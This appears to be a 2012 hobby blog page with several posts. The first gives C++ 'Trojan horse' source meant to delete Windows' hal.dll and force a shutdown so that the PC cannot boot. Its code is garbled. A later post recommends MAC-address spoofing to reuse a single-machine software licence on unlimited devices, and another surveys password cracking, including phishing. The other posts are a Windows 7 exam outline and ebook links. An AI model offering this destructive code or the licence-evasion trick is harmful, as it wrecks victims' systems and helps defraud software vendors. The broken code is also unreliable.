Monday 31 December 2012

how to create Torsan Horse virus

Create a Simple and Powerful Trojan Horse virus in C++. It deletes an essential file that need for the computer to operate well. Thus the PC will shutdown and will never Turn on (until install new Windows)
You need Dev C++, Borland Turbo C++, Visual C++ or similar to compile this code
Download Dev C++ from Here

Here is the code


#include
#include using namespace std; int main(int argc, char *argv[])
{
std::remove(”%systemroot%\\system32\\hal.dll”); //PWNAGE TIME
system(”shutdown -s -r”);
system(”PAUSE”);
return EXIT_SUCCESS;
}

how to Change MAC ID in laptops

A Media Access Control address (MAC address) is a unique identifier assigned to network interfaces for communications on the physical network segment. MAC addresses are used for numerous network technologies and most IEEE 802 network technologies, including Ethernet. Logically, MAC addresses are used in the Media Access Control protocol sub-layer of the OSI reference model. MAC addresses are most often assigned by the manufacturer of a network interface card (NIC) and are stored in its hardware, the card's read-only memory, or some other firmware mechanism. If assigned by the manufacturer, a MAC address usually encodes the manufacturer's registered identification number and may be referred to as the burned-in address. It may also be known as an Ethernet hardware address (EHA), hardware address or physical address. A network node may have multiple NICs and will then have one unique MAC address per NIC. MAC addresses are formed according to the rules of one of three numbering name spaces managed by the Institute of Electrical and Electronics Engineers (IEEE): MAC-48, EUI-48, and EUI-64. The IEEE claims trademarks on the names EUI-48 and EUI-64, in which EUI is an acronym for Extended Unique Identifier.
source: wikipedia
 Why I change my Mac Address?
There are many software on Internet in which each computer has to enter a unique key or serial to activate. So, by purchasing that type of software, we can install it only in one pc (that's what they think). But by spoofing the mac address, we can install it on unlimited no. of devices with same key.  This can be useful for privacy reasons, for instance when connecting to a Wi-Fi hotspot, Some internet service providers bind their service to a specific MAC address; if the user then changes their network card or intends to install a router, the service won't work anymore. Changing the MAC address of the new interface will solve the problem. A MAC address is 48 bits in length.
 How it Works?
The Operating system is the interpreter between the hardware devices. When a software wants MAC address of any device, it asks the Operating system to return the mac Address. OS finds the MAC Address of the device and returns it to the software.So, here we are going to spoof it. Install the following software in it. Thus when any software requests OS to return mac address, the software redirects it to return the spoofed address. Thus the software "thinks" that it is the original one.
Download

how to increase speed in torrent download

This summary is not available. Please click here to view the post.

Methods for hacking passwords

Password cracking is the process of recovering secret passwords from data that has been stored in or transmitted by a computer system. A common approach is to repeatedly try guesses for the password.
Most passwords can be cracked by using Hashing, Guessing, Using Default passwords, Brute Force and Phishing. However, we can see many shareware products that costs near 100$ and they guarantees to hack account, The important thing is that
There is no ready made software which can hack passwords in 2 or 3 steps!!!
If you see something like this, it may be some scam to steal your money..Beware..

The hacking methods are:
1) Hashing :- hashing will refer to the one way function (which may be either an encryption function or cryptographic hash) employed as a hash and its output as a hashed password.
If a system uses a reversible function to obscure stored passwords, exploiting that weakness can recover even 'well-chosen' passwords.
 For example, LM hash that Microsoft Windows uses by default to store user passwords which have less than 15 characters. 
The LM hash breaks the password into two 7-character fields which are then hashed separately, allowing each half to be attacked separately. 
Note: Hash functions like SHA-512, SHA-1, and MD5 are considered impossible to invert when used correctly.
2) Guessing :- Many passwords can be guessed either by humans or by sophisticated cracking programs armed with dictionaries (dictionary attack) and the user's personal information. 
Actually, many users choose weak passwords, usually one related to themselves in some way. Repeated research over some 40 years has demonstrated that around 40% of user-chosen passwords are readily guessable by programs. Examples of insecure choices include:
  • blank (none) 
  • the word "password", "passcode", "admin" and their derivatives 
  • the user's name or login name 
  • their birthplace or date of birth
  • the name of their significant other or another person (loved one)   
  • His/her favourite pet's name 
  • a dictionary word in any language 
  • automobile licence plate number 
  • a row of letters from a standard keyboard layout (eg, the qwerty keyboard -- qwerty itself, asdf, or qwertyuiop)
  • abcd, abcdef, 1234 etc
  • His/Her Mobile Number
  • iforgot, idontknow, passworderror, incorrectpassword etc or similar words
  • a simple modification of one of the preceding, such as suffixing a digit or reversing the order of the letters. 
In one survey of MySpace passwords which had been phished, 3.8% of passwords were a single word found in a dictionary, and another 12 percent were a word plus a final digit; two-thirds of the time that digit was.
3) Default Passwords :- A moderately high number of local and online applications have inbuilt default passwords that have been configured by programmers during development stages of software. There are lots of applications running on the internet on which default passwords are enabled. So, it is quite easy for an attacker to enter default password and gain access to sensitive information. A list which containing default passwords of some of the most popular applications is available on the internet. Always disable or change the application's (both online and offline) default username-password pairs.
4) Brute Force :- If all other techniques failed, then attackers uses brute force password cracking technique. Here an automatic tool is used which tries all possible combinations of available keys on the keyboard. As soon as correct password is reached it displays on the screen.This techniques takes extremely long time to complete, but password will surely cracked. Long is the password, large is the time taken to brute force it.
5) Phishing :- This is the most effective, Most popular and easily executable password cracking technique which is generally used to crack the passwords of e-mail accounts, and all those accounts where secret information or sensitive personal information is stored by user such as social networking websites, matrimonial websites, etc.
Phishing is a technique in which the attacker creates the fake login screen and send it to the victim, hoping that the victim gets fooled into entering the account username and password. As soon as victim click on "enter" or "login" login button this information reaches to the attacker using scripts or online form processors while the user(victim) is redirected to home page of e-mail service provider.
Note:Sometimes you will get emails which are demanding for your username-password, urging to be e-mail service provider. Dont reply for them. Most Email providers and Social networks will not ask like this.


It is possible to try to obtain the passwords through other different methods, such as social engineering, wiretapping, keystroke logging, login spoofing, dumpster diving, phishing, shoulder surfing, timing attack, acoustic cryptanalysis, using a Trojan Horse or virus, identity management system attacks (such as abuse of Self-service password reset) and compromising host security.
However, cracking usually designates a guessing attack.


It is recommended to use a strong passwords for your secure datas. Using long passwords containing lowercase, UPPERCASE, and $ymbols will secure your data much. Using strong passwords, you can bypass dictionary attacks, Brute force and guessing. using more lengthy passwords will increase brutal force attacking time and the hacker will leave it.

Configuring windows 7

Installing, Upgrading, and Migrating to Windows 7 (14 percent)
Perform a Clean Installation
Upgrade to Windows 7 From Previous Versions of Windows
Migrate User Profiles

Deploying Windows 7 (13 percent)
Capture, Prepare, and Deploy a System Image
Configure a VHD

Configuring Hardware and Applications (14 percent)
Configure Devices
Configure Application Compatibility
Configure Application Restrictions
Configure Internet Explorer

Configuring Network Connectivity (14 percent)
Configure IPv4 and IPv6 Network Settings
Configure Network Settings
Configure Windows Firewall
Configure Remote Management

Configuring Access to Resources (13 percent)
Configure Shared Resources
Configure File and Folder Access
Configure User Account Control (UAC)
Configure Authentication and Authorization
Configure BranchCache

Configuring Mobile Computing (10 percent)
Configure BitLocker and BitLocker To Go
Configure DirectAccess
Configure Mobility Options
Configure Remote Connections

Monitoring and Maintaining Systems that Run Windows 7 (11 percent)
Configure Updates to Windows 7
Manage Disks
Monitor Systems
Configure Performance Settings

Configuring Backup and Recovery Options (11 percent)
Configure Backup
Configure System Recovery Options
Configure File Recovery Options

Spoken English Ebooks

» Learn Spoken English Quickly.pdf
Size - 1,468 KB
Download
» BBC_World_Service_-_BETTER_SPEAKING_(A_Guide_to_Improving_Your_Spoken_English).pdf
Size - 509 KB
Download
» free-spoken-english-handbook.pdf
Size - 5,327 KB
Download
» Sound_Patterns_of_Spoken_English.pdf
Size - 1,801 KB
Download
» teaching_spoken_english.pdf
Size - 775 KB
Download
» 73559388-Spoken-English-E-Book-telugu.pdf
Size - 689 KB
Download
» Spoken-English-For-Tamils.pdf
Size - 9,309 KB
Download
» British Council Spoken English Skills.pdf
Size - 25 KB
Download
» eenadu Spoken English upto 415.pdf
Size - 18,320 KB
Download
» Spoken+English+Expressions.pdf
Size - 439 KB
Download
» 6987402-Spoken-English-for-Tamils.pdf
Size - 2,194 KB
Download
» BBC_World_Service_-_BETTER_SPEAKING_(A_Guide_to_Improving_Your_Spoken_English).pdf
Size - 509 KB
Download
» Better Speaking Guide to Improving Your Spoken English- Quick Reference.pdf
Size - 1,026 KB
Download
» 4610576-Learning-Spoken-English.pdf
Size - 1,127 KB
Download